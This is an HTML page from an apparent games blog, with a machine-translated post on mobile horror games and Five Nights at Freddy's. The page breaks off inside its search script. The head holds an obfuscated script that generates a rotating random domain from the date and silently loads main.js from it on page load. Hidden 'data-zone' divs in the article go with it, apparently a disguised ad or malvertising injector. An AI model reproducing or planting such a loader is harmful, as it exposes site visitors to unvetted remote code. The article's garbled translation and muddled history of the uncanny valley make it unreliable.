<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="Horror game, a game type that most players are familiar with and unfamiliar with, basically as long as it is not limited to a few games, players can list one or two, but few players are really willing">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="Horror game, a game type that most players are familiar with and unfamiliar with, basically as long as it is not limited to a few games, players can list one or two, but few players are really willing">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/3af638f86420405d93bf18a7c86d43f4.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/f3979784c4d948cd923e439e48be2b20.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/c545f65e857b49f6ba1b4d482fb21c5a.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/53e790aae0b6447486236ce13726cdc1.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/fdd9e64e3c1c48038efde705045f041e.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/fb39303b22a04f188a99011f01eb071b.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/0a9c6887f17746c8908f31d25ee0c222.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/25ef398dfa6141329d12c44b809b3162.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/f729e6d8ff714570bcb202de2e468d55.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/247f6e3f2cd94d069122eecc75707326.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:50.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley">
<meta name="twitter:description" content="Horror game, a game type that most players are familiar with and unfamiliar with, basically as long as it is not limited to a few games, players can list one or two, but few players are really willing">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/3af638f86420405d93bf18a7c86d43f4.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>Horror game, a game type that most players are familiar with and unfamiliar with, basically as long as it is not limited to a few games, players can list one or two, but few players are really willing to try. Most people’s understanding of the horror game is only obtained from the video or live broadcast on the Internet, and the viewers are always interested in the fact that the host is frightened by the plot in the game. Although the horror game is small, almost every quarter we can see one or two works go on sale, among which there are some works with excellent production and excellent plot, of course, there is no depth to speak of, just for the scary game.<br><img src="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/3af638f86420405d93bf18a7c86d43f4.jpg" alt="Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley"><br>Layer upon layer fear 2 with both literary and artistic atmosphere and fear<br>Terrorist games are not only active in PC and host platforms, but also one of the most vital ways to log in to the huge mobile platform. Since many horror games have been launched on the mobile end, we can obviously see that the activity level of horror Games has increased a lot. In the discussion circle of horror games on the mobile end, it is often said that the experience of horror games on the mobile end is far less than that of PC or console platform, which is not unreasonable, but it does not mean that all horror games on the mobile platform are active “Not scary enough.”.<br><img src="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/f3979784c4d948cd923e439e48be2b20.jpg" alt="Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley"><br>On the level of production excellence, lost within is definitely among the best</p>
<p>#Why don’t horror tour scare people?<br>For mobile platforms, being limited by hardware means that they will be greatly reduced in the sense of substitution first. If a horror game wants to frighten the players, it must create a good sense of presence for the players, but the screen of the mobile platform is too small compared with the PC platform. No matter how good the picture quality is, the details of the scene in the game are hard to be noticed by the players, and it is even possible for the players to jump out of the game itself and pay attention to things outside the game or the surrounding environment, so that they are extremely concerned It’s possible to ignore the producer’s in-game plot for the player to prepare for fear.<br><img src="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/c545f65e857b49f6ba1b4d482fb21c5a.jpg" alt="Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley"><br>In escape, there are many designs to increase the sense of crisis for players<br>Of course, it’s not that the screen is the only indicator to create the atmosphere. The sound effect and music in the game are also one of the general methods to enhance the sense of terror. As we all know, if all the sound effects of the game are turned off when playing horror games, it will be a devastating damage to the thrilling atmosphere in the game. In the same way, it’s hard to imagine a person sitting in a noisy fast food restaurant and playing terror games with his mobile phone. If he doesn’t play in a quiet environment, the role of music and sound effects in creating atmosphere can’t be played.<br>Anyone who knows how to play, whether on the mobile platform or on the PC host platform, will choose a person to enjoy it quietly. Imagine if you are playing a horror game while your family is playing a drama on TV. Do you still have the mind to concentrate on the game? The author’s habit is to turn off the light and play in the bed before going to bed. The advantage is that it can double the sense of terror to make the experience better, and the disadvantage is that it may be too exciting to sleep.</p>
<h1 id="“if-you-think-it’s-scary-it’s-more-scary-for-you”"><a href="#“if-you-think-it’s-scary-it’s-more-scary-for-you”" class="headerlink" title="“if you think it’s scary, it’s more scary for you”"></a>“if you think it’s scary, it’s more scary for you”</h1><p>Scott Coulson is an independent game producer with two children. He has developed more than 30 games, but no one is interested in them all the time, which made him very depressed for a time and had no direction for the development of games. In December 2013, Scott developed a small leisure game for children, “chiper and son wood company”, and the players’ comments made Scott intolerable. Netizens commented that the characters in the game were really frightening, just like horrible video dolls, which broke Scott’s heart. It was very strong that he wanted to quit the game development industry this time.<br><img src="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/53e790aae0b6447486236ce13726cdc1.jpg" alt="Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley"><br>Just as Scott was sulking in the quilt, I don’t know why a strange thought suddenly occurred: since you say my game is frightening, I’ll try a more frightening one for you. After half a year’s development, in 2014, the horror game “five nights at Freddy’s (fnaf)” with the theme of “Teddy Bear video Doll” was born.<br>When the game first entered the Steam, it had to be Tucao. The Chinese translation of the Chinese name was too strange. It was once thought that it was a game of otaku. This game gave people a very rough feeling at first glance. The resolution of the picture was very low, just like the game screen of the 80s and 90s of last century.<br><img src="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/fdd9e64e3c1c48038efde705045f041e.jpg" alt="Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley"><br>It’s not scary to look at, but I’m sure kids don’t like it<br>The story of the game takes place in a pizza shop. The player plays a security guard in the game. He is on duty from midnight to 6am to be responsible for the security of all the computer properties. The selling point of this pizza shop is that it is equipped with machine dolls that attract children. However, these machine dolls are all attached to the dead children. Every midnight, they will act on their own to attack the protagonist , what the player has to do is resist these dolls and survive in five nights. The introduction looks like a tower defense game, but in fact, the operation is very simple. What players can do in the game is just to stay in the security room to watch and monitor the dolls, and use the electronic door of the monitoring room to block the dolls outside. In addition, players can do nothing.<br><img src="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/fb39303b22a04f188a99011f01eb071b.jpg" alt="Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley"><br>There will be more rooms and roads every day. If you don’t observe, you can’t know the route<br>In the past horror games, players can usually explore in various scenes and interact with various things to trigger the sense of terror. There are so many games like fnaf, let alone the rough production of fnaf, which doesn’t seem very scary. In fact, in order to create the best sense of horror for the players, all kinds of designs in the game are intentional.<br>First of all, players can’t move or explore. They can only use the monitoring to observe the situation outside the monitoring room. Those machine dolls are wandering outside. If you don’t use the monitoring, you can’t predict when they will attack. If you use the monitoring, power consumption will be accelerated. If the power is exhausted, you can’t start the electronic door used to block dolls. The electronic door is the only one for players For the means of self-defense, if there is no power, players can only choose to sit and wait for death (there is no picture of jumping and killing below, please read it with ease).<br><img src="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/0a9c6887f17746c8908f31d25ee0c222.jpg" alt="Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley"><br>If the response is not timely or there is no power, the next second is the game over</p>
<p>#The valley of terror theory<br>In 1969, Japanese robot expert Mori Changhong put forward a theory: when robots and humans are similar to each other to a certain extent, human response to them will suddenly become extremely disgusted, that is, even if there is a little difference between robots and humans, it will be very conspicuous and dazzling, so the whole robot has a very stiff and horrible feeling, like facing the line The corpse walks the meat.<br>The higher the simulation degree of humanoid toys or robots is, the better people will feel, but when it exceeds a critical point, this kind of good feeling will suddenly decrease, and the more like people, the more disgusted they are with fear, until the bottom of the valley, which is called the valley of terror. The term “valley of terror” was put forward by Ernst kinch in his 1906 paper psychology of the valley of terror. It was elaborated in the famous psychopsychologist Freud’s paper “valley of terror” in 1919, which became a famous theory.<br><img src="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/25ef398dfa6141329d12c44b809b3162.jpg" alt="Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley"><br>In fnaf, Scott uses this point flexibly. In the whole process of the game, the players are always in a passive state. The actions of several dolls are excessively personified, as if they are playing by the nose of several dolls, which makes the players have fear and resistance psychology. This fear is not sudden, but continuous.<br>At the same time, in this passive situation, the players have to face the instinctive “fear of the unknown” of human beings and the gradually reduced sense of oppression of electricity. Combining these elements together, the sense of terror brought by them can not even be matched by many large-scale terror games. The game received unprecedented praise after logging into PC platform, and was transplanted to mobile platform after that. Even after several months, it has been at the top of download list.<br><img src="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/f729e6d8ff714570bcb202de2e468d55.jpg" alt="Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley"><br>Dolls are not terrible, only when they are haunted<br>Compared with other horror games, rough production has become the feature of fnaf. It doesn’t need much beautiful pictures or high-quality music. The fear he brings to the players is from the inside out, not imposed by the game. Just look at the game mode, fnaf obviously needs to be more suitable for mobile platforms. The operation of the game itself is not complicated just by clicking. If the game is played in the way I mentioned above, it can stimulate more effects than the PC (it is recommended not to try it really).<br>    concluding remarks<br>In addition to the exquisite design of the game playing mode, the game also uses the fragmented narrative similar to silent mountain, which paves a hidden story by adding various details and weird hidden plots in the scene. The story is called “87 bite”, which is a fictitious urban legend in the game. Please find the specific plot by yourself. There is no need to repeat it here, but you need to know something Yes, no one is not interested in urban legends, which is one of the reasons why the series of games are passed on by the players orally. The subculture products derived from the games are also emerging in an endless stream.<br><img src="http://maiygu.xyz/2019/11/08/Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley/247f6e3f2cd94d069122eecc75707326.jpg" alt="Who says the horror games on mobile phones are not scary Teddy Bear perfectly interpreting the theory of horror Valley"><br>So far, “fnaf” series has launched six works, each generation’s style is different, but the sense of fear is the same. “Fnaf” relies on its own unique style, so that people can see the hope that horror games can also be popular. Fnaf has proved to the players that if the characteristics of the mobile terminal are fully considered in the design and the terror atmosphere is rendered by using various functions of the mobile phone, good products can also be created. It is not that the effect of terror games on the mobile phone is not good, but that most games do not bring the fun the players want.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/Why did the spiritual successor of Diablo, who was supposed to be a thriving company, get disbanded/" rel="next" title="Why did the spiritual successor of Diablo, who was supposed to be a thriving company, get disbanded">
                <i class="fa fa-chevron-left"></i> Why did the spiritual successor of Diablo, who was supposed to be a thriving company, get disbanded
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/Who is the winner in the game of asymmetric confrontation/" rel="prev" title="Who is the winner in the game of asymmetric confrontation">
                Who is the winner in the game of asymmetric confrontation <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#“if-you-think-it’s-scary-it’s-more-scary-for-you”"><span class="nav-number">1.</span> <span class="nav-text">“if you think it’s scary, it’s more scary for you”</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
